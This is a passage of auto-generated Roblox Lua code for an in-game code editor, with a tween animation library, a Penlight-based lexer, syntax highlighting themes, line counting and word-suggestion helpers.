assert(frame, "No frame provided") assert(color, "No color provided") assert(timelen, "No time length provided") easingstyle = default(easingstyle, Enum.EasingStyle.Sine) easingdir = default(easingdir, Enum.EasingDirection.Out) -- Generate tween info local tinfo = TweenInfo.new(timelen, easingstyle, easingdir) local goals = { ImageColor3 = color } -- Finally, play tween tweenService:Create(frame, tinfo, goals):Play() end function module.TweenImageRectOffset(frame, offset, timelen, easingstyle, easingdir) -- Errors & defaults assert(frame, "No frame provided") assert(offset, "No offset provided") assert(timelen, "No time length provided") easingstyle = default(easingstyle, Enum.EasingStyle.Sine) easingdir = default(easingdir, Enum.EasingDirection.Out) -- Generate tween info local tinfo = TweenInfo.new(timelen, easingstyle, easingdir) local goals = { ImageRectOffset = offset } -- Finally, play tween tweenService:Create(frame, tinfo, goals):Play() end function module.TweenImageRectSize(frame, size, timelen, easingstyle, easingdir) -- Errors & defaults assert(frame, "No frame provided") assert(size, "No size provided") assert(timelen, "No time length provided") easingstyle = default(easingstyle, Enum.EasingStyle.Sine) easingdir = default(easingdir, Enum.EasingDirection.Out) -- Generate tween info local tinfo = TweenInfo.new(timelen, easingstyle, easingdir) local goals = { ImageRectSize = size } -- Finally, play tween tweenService:Create(frame, tinfo, goals):Play() end function module.TweenSliceScale(frame, scale, timelen, easingstyle, easingdir) -- Errors & defaults assert(frame, "No frame provided") assert(scale, "No scale provided") assert(timelen, "No time length provided") easingstyle = default(easingstyle, Enum.EasingStyle.Sine) easingdir = default(easingdir, Enum.EasingDirection.Out) -- Generate tween info local tinfo = TweenInfo.new(timelen, easingstyle, easingdir) local goals = { SliceScale = scale } -- Finally, play tween tweenService:Create(frame, tinfo, goals):Play() end function module.TweenTextColor3(frame, color, timelen, easingstyle, easingdir) -- Errors & defaults assert(frame, "No frame provided") assert(color, "No color provided") assert(timelen, "No time length provided") easingstyle = default(easingstyle, Enum.EasingStyle.Sine) easingdir = default(easingdir, Enum.EasingDirection.Out) -- Generate tween info local tinfo = TweenInfo.new(timelen, easingstyle, easingdir) local goals = { TextColor3 = color } -- Finally, play tween tweenService:Create(frame, tinfo, goals):Play() end function module.TweenMaxVisibleGraphemes(frame, graphemes, timelen, easingstyle, easingdir) -- Errors & defaults assert(frame, "No frame provided") assert(graphemes, "No graphemes provided") assert(timelen, "No time length provided") easingstyle = default(easingstyle, Enum.EasingStyle.Sine) easingdir = default(easingdir, Enum.EasingDirection.Out) -- Generate tween info local tinfo = TweenInfo.new(timelen, easingstyle, easingdir) local goals = { MaxVisibleGraphemes = graphemes } -- Finally, play tween tweenService:Create(frame, tinfo, goals):Play() end function module.TweenTextSize(frame, size, timelen, easingstyle, easingdir) -- Errors & defaults assert(frame, "No frame provided") assert(size, "No size provided") assert(timelen, "No time length provided") easingstyle = default(easingstyle, Enum.EasingStyle.Sine) easingdir = default(easingdir, Enum.EasingDirection.Out) -- Generate tween info local tinfo = TweenInfo.new(timelen, easingstyle, easingdir) local goals = { TextSize = size } -- Finally, play tween tweenService:Create(frame, tinfo, goals):Play() end function module.TweenTextStrokeColor3(frame, color, timelen, easingstyle, easingdir) -- Errors & defaults assert(frame, "No frame provided") assert(color, "No color provided") assert(timelen, "No time length provided") easingstyle = default(easingstyle, Enum.EasingStyle.Sine) easingdir = default(easingdir, Enum.EasingDirection.Out) -- Generate tween info local tinfo = TweenInfo.new(timelen, easingstyle, easingdir) local goals = { TextStrokeColor3 = color } -- Finally, play tween tweenService:Create(frame, tinfo, goals):Play() end function module.TweenTextTransparency(frame, transparency, timelen, easingstyle, easingdir) -- Errors & defaults assert(frame, "No frame provided") assert(transparency, "No transparency provided") assert(timelen, "No time length provided") easingstyle = default(easingstyle, Enum.EasingStyle.Sine) easingdir = default(easingdir, Enum.EasingDirection.Out) -- Generate tween info local tinfo = TweenInfo.new(timelen, easingstyle, easingdir) local goals = { TextTransparency = transparency } -- Finally, play tween tweenService:Create(frame, tinfo, goals):Play() end function module.TweenTextStrokeTransparency(frame, transparency, timelen, easingstyle, easingdir) -- Errors & defaults assert(frame, "No frame provided") assert(transparency, "No transparency provided") assert(timelen, "No time length provided") easingstyle = default(easingstyle, Enum.EasingStyle.Sine) easingdir = default(easingdir, Enum.EasingDirection.Out) -- Generate tween info local tinfo = TweenInfo.new(timelen, easingstyle, easingdir) local goals = { TextStrokeTransparency = transparency } -- Finally, play tween tweenService:Create(frame, tinfo, goals):Play() end function module.TweenCanvasSize(frame, size, timelen, easingstyle, easingdir) -- Errors & defaults assert(frame, "No frame provided") assert(size, "No size provided") assert(timelen, "No time length provided") easingstyle = default(easingstyle, Enum.EasingStyle.Sine) easingdir = default(easingdir, Enum.EasingDirection.Out) -- Generate tween info local tinfo = TweenInfo.new(timelen, easingstyle, easingdir) local goals = { CanvasSize = size } -- Finally, play tween tweenService:Create(frame, tinfo, goals):Play() end function module.TweenCanvasPosition(frame, position, timelen, easingstyle, easingdir) -- Errors & defaults assert(frame, "No frame provided") assert(position, "No position provided") assert(timelen, "No time length provided") easingstyle = default(easingstyle, Enum.EasingStyle.Sine) easingdir = default(easingdir, Enum.EasingDirection.Out) -- Generate tween info local tinfo = TweenInfo.new(timelen, easingstyle, easingdir) local goals = { CanvasPosition = position } -- Finally, play tween tweenService:Create(frame, tinfo, goals):Play() end function module.TweenScrollBarImageTransparency(frame, transparency, timelen, easingstyle, easingdir) -- Errors & defaults assert(frame, "No frame provided") assert(transparency, "No transparency provided") assert(timelen, "No time length provided") easingstyle = default(easingstyle, Enum.EasingStyle.Sine) easingdir = default(easingdir, Enum.EasingDirection.Out) -- Generate tween info local tinfo = TweenInfo.new(timelen, easingstyle, easingdir) local goals = { ScrollBarImageTransparency = transparency } -- Finally, play tween tweenService:Create(frame, tinfo, goals):Play() end function module.TweenScrollBarThickness(frame, thickness, timelen, easingstyle, easingdir) -- Errors & defaults assert(frame, "No frame provided") assert(thickness, "No thickness provided") assert(timelen, "No time length provided") easingstyle = default(easingstyle, Enum.EasingStyle.Sine) easingdir = default(easingdir, Enum.EasingDirection.Out) -- Generate tween info local tinfo = TweenInfo.new(timelen, easingstyle, easingdir) local goals = { ScrollBarThickness = thickness } -- Finally, play tween tweenService:Create(frame, tinfo, goals):Play() end function module.TweenScrollBarImageColor3(frame, color, timelen, easingstyle, easingdir) -- Errors & defaults assert(frame, "No frame provided") assert(color, "No color provided") assert(timelen, "No time length provided") easingstyle = default(easingstyle, Enum.EasingStyle.Sine) easingdir = default(easingdir, Enum.EasingDirection.Out) -- Generate tween info local tinfo = TweenInfo.new(timelen, easingstyle, easingdir) local goals = { ScrollBarImageColor3 = color } -- Finally, play tween tweenService:Create(frame, tinfo, goals):Play() end function module.TweenCFrame(thing, cframe, timelen, easingstyle, easingdir) -- Errors & defaults assert(thing, "No instance provided") assert(cframe, "No cframe provided") assert(timelen, "No time length provided") easingstyle = default(easingstyle, Enum.EasingStyle.Sine) easingdir = default(easingdir, Enum.EasingDirection.Out) -- Generate tween info local tinfo = TweenInfo.new(timelen, easingstyle, easingdir) local goals = { CFrame = cframe } -- Finally, play tween tweenService:Create(thing, tinfo, goals):Play() end function module.TweenFOV(thing, fov, timelen, easingstyle, easingdir) -- Errors & defaults assert(thing, "No instance provided") assert(fov, "No FOV provided") assert(timelen, "No time length provided") easingstyle = default(easingstyle, Enum.EasingStyle.Sine) easingdir = default(easingdir, Enum.EasingDirection.Out) -- Generate tween info local tinfo = TweenInfo.new(timelen, easingstyle, easingdir) local goals = { FieldOfView = fov } -- Finally, play tween tweenService:Create(thing, tinfo, goals):Play() end function module.TweenValue(thing, value, timelen, easingstyle, easingdir) -- Errors & defaults assert(thing, "No instance provided") assert(value, "No value provided") assert(timelen, "No time length provided") easingstyle = default(easingstyle, Enum.EasingStyle.Sine) easingdir = default(easingdir, Enum.EasingDirection.Out) -- Generate tween info local tinfo = TweenInfo.new(timelen, easingstyle, easingdir) local goals = { Value = value } -- Finally, play tween tweenService:Create(thing, tinfo, goals):Play() end function module.TweenVolume(thing, volume, timelen, easingstyle, easingdir) -- Errors & defaults assert(thing, "No instance provided") assert(volume, "No volume provided") assert(timelen, "No time length provided") easingstyle = default(easingstyle, Enum.EasingStyle.Sine) easingdir = default(easingdir, Enum.EasingDirection.Out) -- Generate tween info local tinfo = TweenInfo.new(timelen, easingstyle, easingdir) local goals = { Volume = volume } -- Finally, play tween tweenService:Create(thing, tinfo, goals):Play() end return module end; }; G2L_MODULES[G2L["67"]] = { Closure = function() local script = G2L["67"]; local module = {} function module.next(self) self.position += 1 local character = self.text:sub(self.position, self.position) if character == "\n" or character == " " or self.position > #self.text then return self.position - 1 else return self:next() end end function module.prev(self) self.position -= 1 local character = self.text:sub(self.position, self.position) if character == "\n" or character == " " or self.position < 1 then return self.position + 1 else return self:prev() end end function module.GetCurrentWord(self, textbox) self.cursorPosition = textbox.CursorPosition self.position = self.cursorPosition self.text = textbox.Text local wordEnd = self:next() local wordStart = self:prev() local wordString = self.text:sub(wordStart, wordEnd) return wordString end return module end; }; G2L_MODULES[G2L["68"]] = { Closure = function() local script = G2L["68"]; --[[ Lexical scanner for creating a sequence of tokens from Lua source code. This is a heavily modified and Roblox-optimized version of the original Penlight Lexer module: https://github.com/stevedonovan/Penlight Authors: stevedonovan ----------------- Original Penlight lexer author ryanjmulder ----------------- Penlight lexer contributer mpeterv ----------------- Penlight lexer contributer Tieske ----------------- Penlight lexer contributer boatbomber ----------------- Roblox port, optimizations, and bug fixes Sleitnick ----------------- Roblox optimizations Usage: local source = "for i = 1,n do end" -- The 'scan' function returns a token iterator: for token,src in lexer.scan(source) do print(token, src) end > keyword for > iden i > = = > number 1 > , , > iden n > keyword do > keyword end List of tokens: - keyword - builtin - iden - string - number - space - comment Other tokens that don't fall into the above categories will simply be returned as itself. For instance, operators like "+" will simply return "+" as the token. --]] local lexer = {} local yield, wrap = coroutine.yield, coroutine.wrap local strfind = string.find local strsub = string.sub local append = table.insert local type = type local NUMBER1 = "^[%+%-]?%d+%.?%d*[eE][%+%-]?%d+" local NUMBER2 = "^[%+%-]?%d+%.?%d*" local NUMBER3 = "^0x[%da-fA-F]+" local NUMBER4 = "^%d+%.?%d*[eE][%+%-]?%d+" local NUMBER5 = "^%d+%.?%d*" local IDEN = "^[%a_][%w_]*" local WSPACE = "^%s+" local STRING1 = "^(['\"])%1" --Empty String local STRING2 = [[^(['"])(\*)%2%1]] local STRING3 = [[^(['"]).-[^\](\*)%2%1]] local STRING4 = "^(['\"]).-.*" --Incompleted String local STRING5 = "^%[(=*)%[.-%]%1%]" --Multiline-String local STRING6 = "^%[%[.-.*" --Incompleted Multiline-String local CHAR1 = "^''" local CHAR2 = [[^'(\*)%1']] local CHAR3 = [[^'.-[^\](\*)%1']] local PREPRO = "^#.-[^\\]\n" local MCOMMENT1 = "^%-%-%[(=*)%[.-%]%1%]" --Completed Multiline-Comment local MCOMMENT2 = "^%-%-%[%[.-.*" --Incompleted Multiline-Comment local SCOMMENT1 = "^%-%-.-\n" --Completed Singleline-Comment local SCOMMENT2 = "^%-%-.-.*" --Incompleted Singleline-Comment local THINGY = "^[%.:]%w-%s?%(.-%)" local lua_keyword = { ["and"] = true, ["break"] = true, ["do"] = true, ["else"] = true, ["elseif"] = true, ["end"] = true, ["false"] = true, ["for"] = true, ["function"] = true, ["if"] = true, ["in"] = true, ["local"] = true, ["nil"] = true, ["not"] = true, ["while"] = true, ["or"] = true, ["repeat"] = true, ["return"] = true, ["then"] = true, ["true"] = true, ["self"] = true, ["until"] = true } local lua_builtin = { ["assert"] = true;["collectgarbage"] = true;["error"] = true;["_G"] = true; ["gcinfo"] = true;["getfenv"] = true;["getmetatable"] = true;["ipairs"] = true; ["loadstring"] = true;["newproxy"] = true;["next"] = true;["pairs"] = true; ["pcall"] = true;["print"] = true;["rawequal"] = true;["rawget"] = true;["rawset"] = true; ["select"] = true;["setfenv"] = true;["setmetatable"] = true;["tonumber"] = true; ["tostring"] = true;["type"] = true;["unpack"] = true;["_VERSION"] = true;["xpcall"] = true; ["delay"] = true;["elapsedTime"] = true;["require"] = true;["spawn"] = true;["tick"] = true; ["time"] = true;["typeof"] = true;["UserSettings"] = true;["wait"] = true;["warn"] = true; ["game"] = true;["Enum"] = true;["script"] = true;["shared"] = true;["workspace"] = true; ["Axes"] = true;["BrickColor"] = true;["CFrame"] = true;["Color3"] = true;["ColorSequence"] = true; ["ColorSequenceKeypoint"] = true;["Faces"] = true;["Instance"] = true;["NumberRange"] = true; ["NumberSequence"] = true;["NumberSequenceKeypoint"] = true;["PhysicalProperties"] = true; ["Random"] = true;["Ray"] = true;["Rect"] = true;["Region3"] = true;["Region3int16"] = true; ["TweenInfo"] = true;["UDim"] = true;["UDim2"] = true;["Vector2"] = true;["Vector3"] = true; ["Vector3int16"] = true;["next"] = true;["dofile"] = true;["writefile"] = true;["readfile"] = true; ["isfile"] = true;["delfile"] = true;["isfolder"] = true;["makefolder"] = true;["delfolder"] = true;["listfiles"] = true; ["descend"] = true; ["os"] = true; --["os.time"] = true;["os.date"] = true;["os.difftime"] = true; ["debug"] = true; --["debug.traceback"] = true;["debug.profilebegin"] = true;["debug.profileend"] = true; ["math"] = true; --["math.abs"] = true;["math.acos"] = true;["math.asin"] = true;["math.atan"] = true;["math.atan2"] = true;["math.ceil"] = true;["math.clamp"] = true;["math.cos"] = true;["math.cosh"] = true;["math.deg"] = true;["math.exp"] = true;["math.floor"] = true;["math.fmod"] = true;["math.frexp"] = true;["math.ldexp"] = true;["math.log"] = true;["math.log10"] = true;["math.max"] = true;["math.min"] = true;["math.modf"] = true;["math.noise"] = true;["math.pow"] = true;["math.rad"] = true;["math.random"] = true;["math.randomseed"] = true;["math.sign"] = true;["math.sin"] = true;["math.sinh"] = true;["math.sqrt"] = true;["math.tan"] = true;["math.tanh"] = true; ["coroutine"] = true; --["coroutine.create"] = true;["coroutine.resume"] = true;["coroutine.running"] = true;["coroutine.status"] = true;["coroutine.wrap"] = true;["coroutine.yield"] = true; ["string"] = true; --["string.byte"] = true;["string.char"] = true;["string.dump"] = true;["string.find"] = true;["string.format"] = true;["string.len"] = true;["string.lower"] = true;["string.match"] = true;["string.rep"] = true;["string.reverse"] = true;["string.sub"] = true;["string.upper"] = true;["string.gmatch"] = true;["string.gsub"] = true; ["table"] = true; --["table.concat"] = true;["table.insert"] = true;["table.remove"] = true;["table.sort"] = true; } local function tdump(tok) return yield(tok, tok) end local function ndump(tok) return yield("number", tok) end local function sdump(tok) return yield("string", tok) end local function cdump(tok) return yield("comment", tok) end local function wsdump(tok) return yield("space", tok) end local function lua_vdump(tok) if (lua_keyword[tok]) then return yield("keyword", tok) elseif (lua_builtin[tok]) then return yield("builtin", tok) else return yield("iden", tok) end end local function thingy_dump(tok) return yield("thingy", tok) end local lua_matches = { {THINGY, thingy_dump}, {IDEN, lua_vdump}, -- Indentifiers {WSPACE, wsdump}, -- Whitespace {NUMBER3, ndump}, -- Numbers {NUMBER4, ndump}, {NUMBER5, ndump}, {STRING1, sdump}, -- Strings {STRING2, sdump}, {STRING3, sdump}, {STRING4, sdump}, {STRING5, sdump}, -- Multiline-Strings {STRING6, sdump}, -- Multiline-Strings {MCOMMENT1, cdump}, -- Multiline-Comments {MCOMMENT2, cdump}, {SCOMMENT1, cdump}, -- Singleline-Comments {SCOMMENT2, cdump}, {"^==", tdump}, -- Operators {"^~=", tdump}, {"^<=", tdump}, {"^>=", tdump}, {"^%.%.%.", tdump}, {"^%.%.", tdump}, {"^.", tdump}, } local num_lua_matches = #lua_matches --- Create a plain token iterator from a string. -- @tparam string s a string. function lexer.scan(s) local function lex(first_arg) local line_nr = 0 local sz = #s local idx = 1 -- res is the value used to resume the coroutine. local function handle_requests(res) while (res) do local tp = type(res) -- Insert a token list: if (tp == "table") then res = yield("", "") for i = 1,#res do local t = res[i] res = yield(t[1], t[2]) end elseif (tp == "string") then -- Or search up to some special pattern: local i1, i2 = strfind(s, res, idx) if (i1) then local tok = strsub(s, i1, i2) idx = (i2 + 1) res = yield("", tok) else res = yield("", "") idx = (sz + 1) end else res = yield(line_nr, idx) end end end handle_requests(first_arg) line_nr = 1 while (true) do if (idx > sz) then while (true) do handle_requests(yield()) end end for i = 1,num_lua_matches do local m = lua_matches[i] local pat = m[1] local fun = m[2] local findres = {strfind(s, pat, idx)} local i1, i2 = findres[1], findres[2] if (i1) then local tok = strsub(s, i1, i2) idx = (i2 + 1) lexer.finished = (idx > sz) local res = fun(tok, findres) if (tok:find("\n")) then -- Update line number: local _,newlines = tok:gsub("\n", {}) line_nr = (line_nr + newlines) end handle_requests(res) break end end end end return wrap(lex) end return lexer end; }; G2L_MODULES[G2L["69"]] = { Closure = function() local script = G2L["69"]; local module = {} --// Vars local words = require(script.Parent.Words) local GetWord = require(script.Parent.GetWord) local getLine = require(script.Parent.GetLine) --// Funcs function module.GetCurrentWord(self) return GetWord:GetCurrentWord(self.Textbox) end function module.Search(self) return nil end function module.Start(self, editor) self.Editor = editor self.Textbox = editor.Scroll.Source self.SuggestionButton = self.Textbox.Suggestion self.Textbox:GetPropertyChangedSignal("Text"):Connect(function() local foundWord, matchedLength = nil if foundWord then local position = UDim2.new(0, 0,0, getLine:GetCurrentLine(self.Textbox) * self.Textbox.TextSize) self.SuggestionButton.Text = foundWord self.SuggestionButton.Position = position self.SuggestionButton.Visible = true self.MatchedLength = matchedLength else self.SuggestionButton.Visible = false end end) self.SuggestionButton.MouseButton1Click:Connect(function(input) -- Fill in the word local word = self.SuggestionButton.Text self.SuggestionButton.Visible = false self.Textbox.Text = self.Textbox.Text:sub(1, self.Textbox.CursorPosition - 1 - (self.MatchedLength or 0)) .. word .. self.Textbox.Text:sub(self.Textbox.CursorPosition + 1, #self.Textbox.Text) local newCursorPosition = self.Textbox.CursorPosition + #word - self.MatchedLength wait() self.Textbox:ReleaseFocus() self.Textbox:CaptureFocus() self.Textbox.CursorPosition = newCursorPosition end) end return module end; }; G2L_MODULES[G2L["6a"]] = { Closure = function() local script = G2L["6a"]; local words = { ['print'] = 'builtin', ['warn'] = 'builtin', ['Vector3'] = 'builtin', ['Vector2'] = 'builtin', ['error'] = 'builtin', ['Instance'] = 'builtin', ['game'] = 'builtin', ['script'] = 'builtin', ['workspace'] = 'builtin', ['while'] = 'keyword', ['true'] = 'keyword', ['false'] = 'keyword', ['then'] = 'keyword', ['do'] = 'keyword', ['if'] = 'keyword', } return words end; }; G2L_MODULES[G2L["6b"]] = { Closure = function() local script = G2L["6b"]; -- Fixes a Roblox bug with RichText -- If the bug gets fixed, this will break the editor (visually). -- In this case, please remove any instances of this module being used. local module = {} function module.Fix(textbox) if textbox.Text:sub(1, 1) ~= "\n" then textbox.Text = "\n" .. textbox.Text end textbox.Position = UDim2.new(0, -3.5,0,-8.8) textbox.Size = UDim2.new(1, 4,1, textbox.TextSize) end return module end; }; G2L_MODULES[G2L["b0"]] = { Closure = function() local script = G2L["b0"]; -- Lexer by sleitnick -- Everything else by me, bread. lol. local module = {} local syntax = require(script.Syntax) local getLines = require(script.GetLines) local fakeEditor = require(script.FakeEditor) local textFixer = require(script.TextFixer) local getLine = require(script.GetLine) local tween = require(script.TweenLibrary) local suggestions = require(script.Suggestions) function module.new(frame) local newEditor = script.Editor:Clone() newEditor.Parent = frame local editorObj = fakeEditor.new(newEditor) local textbox = newEditor.Scroll.Source local linesLabel = newEditor.Scroll.Left.Lines local lineHighlight = textbox.LineHighlight local highlightBox = Instance.new("TextLabel") highlightBox.Size = UDim2.new(1, 0,1, 0) highlightBox.Position = UDim2.new(0, 0,0, 0) highlightBox.TextColor3 = textbox.TextColor3 highlightBox.BackgroundTransparency = 1 highlightBox.Name = "Syntax" highlightBox.RichText = true highlightBox.TextSize = textbox.TextSize highlightBox.Font = textbox.Font highlightBox.TextXAlignment = Enum.TextXAlignment.Left highlightBox.TextYAlignment = Enum.TextYAlignment.Top highlightBox.TextStrokeColor3 = Color3.fromRGB(40, 40, 40) highlightBox.TextStrokeTransparency = 0.1 highlightBox.Text = "" highlightBox.Parent = textbox editorObj:SetTheme("default") textFixer.Fix(highlightBox) suggestions:Start(newEditor) textbox:GetPropertyChangedSignal("Text"):Connect(function() syntax.Highlight(highlightBox, textbox.Text) -- Fix tabs textbox.Text = textbox.Text:gsub("\t", " ") --textbox.CursorPosition += 4 -- Update line count linesLabel.Text = getLines.GetLinesString(textbox.Text) end) textbox:GetPropertyChangedSignal("CursorPosition"):Connect(function() -- Position line highlight local lineYPos = ((getLine:GetCurrentLine(textbox) * textbox.TextSize) - math.ceil(lineHighlight.AbsoluteSize.Y / 2)) + 4 if lineYPos ~= lineHighlight.Position.Y.Offset then tween.TweenPosition(lineHighlight, UDim2.new(0, -10,0, lineYPos), 0.1, Enum.EasingStyle.Quad) end end) return editorObj end return module end; }; G2L_MODULES[G2L["b1"]] = { Closure = function() local script = G2L["b1"]; local module = {} local lexer = require(script.Parent.Lexer) local theme = require(script.Parent.Theme) local textFixer = require(script.Parent.TextFixer) local function ColorToFont(text, color) return string.format( '%s', tostring(math.floor(color.R * 255)), tostring(math.floor(color.G * 255)), tostring(math.floor(color.B * 255)), text ) end function module.Highlight(textbox, source) textbox.Text = "" for tokenType, text in lexer.scan(source) do local currentTheme = theme.current local tokenCol = currentTheme[tokenType] if tokenCol then textbox.Text = textbox.Text .. ColorToFont(text, tokenCol) else textbox.Text = textbox.Text .. text end end textFixer.Fix(textbox) end return module end; }; G2L_MODULES[G2L["b2"]] = { Closure = function() local script = G2L["b2"]; local theme = { current = nil, themes = { ["default"] = { ["keyword"] = Color3.fromRGB(248, 109, 124), ["builtin"] = Color3.fromRGB(84, 184, 247), ["string"] = Color3.fromRGB(130, 241, 149), ["number"] = Color3.fromRGB(255, 198, 0), ["comment"] = Color3.fromRGB(106, 106, 100), ["thingy"] = Color3.fromRGB(253, 251, 154) }, ["extra 2"] = { ["keyword"] = Color3.fromRGB(249, 36, 114), ["builtin"] = Color3.fromRGB(95, 209, 250), ["string"] = Color3.fromRGB(217, 219, 88), ["number"] = Color3.fromRGB(161, 118, 209), ["comment"] = Color3.fromRGB(116, 122, 101), ["thingy"] = Color3.fromRGB(248, 245, 139) } } } return theme end; }; G2L_MODULES[G2L["b3"]] = { Closure = function() local script = G2L["b3"]; local module = {} function module.GetLines(text) local amount = 1 text:gsub("\n", function() amount += 1 end) return amount end function module.GetLinesString(text) local lineAmt = module.GetLines(text) local result = "" for i = 1, lineAmt do result = result .. i .. "\n" end -- Remove last \n result = result:sub(1, #result - 1) return result end return module end; }; G2L_MODULES[G2L["b4"]] = { Closure = function() local script = G2L["b4"]; local fakeEditor = {} -- Main module local textFixer = require(script.Parent.TextFixer) local theme = require(script.Parent.Theme) local syntax = require(script.Parent.Syntax) local editorObj = { SetTextSize = function(self, textSize) local sourceBox = self.Editor.Scroll.Source local syntaxBox = sourceBox.Syntax local linesBox = self.Editor.Scroll.Left.Lines local lineHighlight = sourceBox.LineHighlight sourceBox.TextSize = textSize syntaxBox.TextSize = textSize linesBox.TextSize = textSize lineHighlight.Size = UDim2.new(1, 0,0, textSize + 5) --[[ Might want to fix it manually because adding another \n might cause some instability ]] textFixer.Fix(self.Editor.Scroll.Source.Syntax) return textSize end, Destroy = function(self) self.Editor:Destroy() setmetatable(self, {__index = nil}) table.clear(self) self = nil return nil end, GetText = function(self) local sourceBox = self.Editor.Scroll.Source return sourceBox.Text end, SetText = function(self, text) local sourceBox = self.Editor.Scroll.Source sourceBox.Text = text return text end, ContentToBytes = function(self) local text = self.Editor.Scroll.Source.Text local bytes = {} for _, c in pairs(text:split("")) do table.insert(bytes, string.byte(c)) end return "/" .. table.concat(bytes, "/") end, Hide = function(self) local hiddenLabel = self.Editor.Scroll.Source.Hidden hiddenLabel.Visible = true end, Unhide = function(self) local hiddenLabel = self.Editor.Scroll.Source.Hidden hiddenLabel.Visible = false end, SetTheme = function(self, themeName) local sourceBox = self.Editor.Scroll.Source local syntaxBox = sourceBox.Syntax assert(theme.themes[themeName], "'" .. themeName .. "' is not a valid theme.") theme.current = theme.themes[themeName] -- Update highlighting syntax.Highlight(syntaxBox, sourceBox.Text) end, } function fakeEditor.new(editor) return setmetatable({Editor = editor}, {__index = editorObj}) end return fakeEditor end; }; G2L_MODULES[G2L["b5"]] = { Closure = function() local script = G2L["b5"]; local module = {} function module.peekBack(self) return self.text:sub(self.position - 1, self.position - 1) end function module.next(self) self.position += 1 self.character = self.text:sub(self.position, self.position) if self.character == "\n" then self.lines += 1 end if self.position < #self.text and self.position < self.cursorPosition then self:next() end end function module.GetCurrentLine(self, textbox) self.position = 0 self.text = textbox.Text .. " " self.cursorPosition = textbox.CursorPosition self.lines = 1 self:next() return self.lines end function module.GetCurrentLineWidth(self, textbox) self.position = 0 self.text = textbox.Text .. " " self.cursorPosition = textbox.CursorPosition self.lines = 1 self:next() -- self.lines is the current line return self.position end return module end; }; G2L_MODULES[G2L["b6"]] = { Closure = function() local script = G2L["b6"]; local module = {} local tweenService = game:GetService("TweenService") local debris = game:GetService("Debris") -- Custom functions local function default(arg, def) if arg == nil then arg = def end return arg end -- Guis -- function module.TweenScale(frame, scale, timelen, easingstyle, easingdir) local uiscale if not frame:FindFirstChild("$ScaleAnim") then uiscale = Instance.new("UIScale") uiscale.Scale = 1 uiscale.Name = "$ScaleAnim" uiscale.Parent = frame end -- Generate tween info local tinfo = TweenInfo.new(timelen, easingstyle, easingdir) local goals = { Scale = scale } -- Finally, play tween tweenService:Create(uiscale, tinfo, goals):Play() --debris:AddItem(uiscale, timelen) -- Remove it when animation is done end function module.TweenPosition(frame, position, timelen, easingstyle, easingdir) -- Errors & defaults assert(frame, "No frame provided") assert(position, "No position provided") assert(timelen, "No time length provided") easingstyle = default(easingstyle, Enum.EasingStyle.Sine) easingdir = default(easingdir, Enum.EasingDirection.Out) -- Generate tween info local tinfo = TweenInfo.new(timelen, easingstyle, easingdir) local goals = { Position = position } -- Finally, play tween tweenService:Create(frame, tinfo, goals):Play() end function module.TweenSize(frame, size, timelen, easingstyle, easingdir) -- Errors & defaults assert(frame, "No frame provided") assert(size, "No size provided") assert(timelen, "No time length provided") easingstyle = default(easingstyle, Enum.EasingStyle.Sine) easingdir = default(easingdir, Enum.EasingDirection.Out) -- Generate tween info local tinfo = TweenInfo.new(timelen, easingstyle, easingdir) local goals = { Size = size } -- Finally, play tween tweenService:Create(frame, tinfo, goals):Play() end function module.TweenBackgroundColor3(frame, color, timelen, easingstyle, easingdir) -- Errors & defaults assert(frame, "No frame provided") assert(color, "No color provided") assert(timelen, "No time length provided") easingstyle = default(easingstyle, Enum.EasingStyle.Sine) easingdir = default(easingdir, Enum.EasingDirection.Out) -- Generate tween info local tinfo = TweenInfo.new(timelen, easingstyle, easingdir) local goals = { BackgroundColor3 = color } -- Finally, play tween tweenService:Create(frame, tinfo, goals):Play() end function module.TweenBackgroundTransparency(frame, transparency, timelen, easingstyle, easingdir) -- Errors & defaults assert(frame, "No frame provided") assert(transparency, "No transparency provided") assert(timelen, "No time length provided") easingstyle = default(easingstyle, Enum.EasingStyle.Sine) easingdir = default(easingdir, Enum.EasingDirection.Out) -- Generate tween info local tinfo = TweenInfo.new(timelen, easingstyle, easingdir) local goals = { BackgroundTransparency = transparency } -- Finally, play tween tweenService:Create(frame, tinfo, goals):Play() end function module.TweenBorderColor3(frame, color, timelen, easingstyle, easingdir) -- Errors & defaults assert(frame, "No frame provided") assert(color, "No color provided") assert(timelen, "No time length provided") easingstyle = default(easingstyle, Enum.EasingStyle.Sine) easingdir = default(easingdir, Enum.EasingDirection.Out) -- Generate tween info local tinfo = TweenInfo.new(timelen, easingstyle, easingdir) local goals = { BorderColor3 = color } -- Finally, play tween tweenService:Create(frame, tinfo, goals):Play() end function module.TweenBorderSizePixel(frame, bordersize, timelen, easingstyle, easingdir) -- Errors & defaults assert(frame, "No frame provided") assert(bordersize, "No border size provided") assert(timelen, "No time length provided") easingstyle = default(easingstyle, Enum.EasingStyle.Sine) easingdir = default(easingdir, Enum.EasingDirection.Out) -- Generate tween info local tinfo = TweenInfo.new(timelen, easingstyle, easingdir) local goals = { BorderSizePixel = bordersize } -- Finally, play tween tweenService:Create(frame, tinfo, goals):Play() end function module.TweenImageTransparency(frame, imagetransparency, timelen, easingstyle, easingdir) -- Errors & defaults assert(frame, "No frame provided") assert(imagetransparency, "No image transparency provided") assert(timelen, "No time length provided") easingstyle = default(easingstyle, Enum.EasingStyle.Sine) easingdir = default(easingdir, Enum.EasingDirection.Out) -- Generate tween info local tinfo = TweenInfo.new(timelen, easingstyle, easingdir) local goals = { ImageTransparency = imagetransparency } -- Finally, play tween tweenService:Create(frame, tinfo, goals):Play() end function module.TweenImageColor3(frame, color, timelen, easingstyle, easingdir) -- Errors & defaults assert(frame, "No frame provided") assert(color, "No color provided") assert(timelen, "No time length provided") easingstyle = default(easingstyle, Enum.EasingStyle.Sine) easingdir = default(easingdir, Enum.EasingDirection.Out) -- Generate tween info local tinfo = TweenInfo.new(timelen, easingstyle, easingdir) local goals = { ImageColor3 = color } -- Finally, play tween tweenService:Create(frame, tinfo, goals):Play() end function module.TweenImageRectOffset(frame, offset, timelen, easingstyle, easingdir) -- Errors & defaults assert(frame, "No frame provided") assert(offset, "No offset provided") assert(timelen, "No time length provided") easingstyle = default(easingstyle, Enum.EasingStyle.Sine) easingdir = default(easingdir, Enum.EasingDirection.Out) -- Generate tween info local tinfo = TweenInfo.new(timelen, easingstyle, easingdir) local goals = { ImageRectOffset = offset } -- Finally, play tween tweenService:Create(frame, tinfo, goals):Play() end function module.TweenImageRectSize(frame, size, timelen, easingstyle, easingdir) -- Errors & defaults assert(frame, "No frame provided") assert(size, "No size provided") assert(timelen, "No time length provided") easingstyle = default(easingstyle, Enum.EasingStyle.Sine) 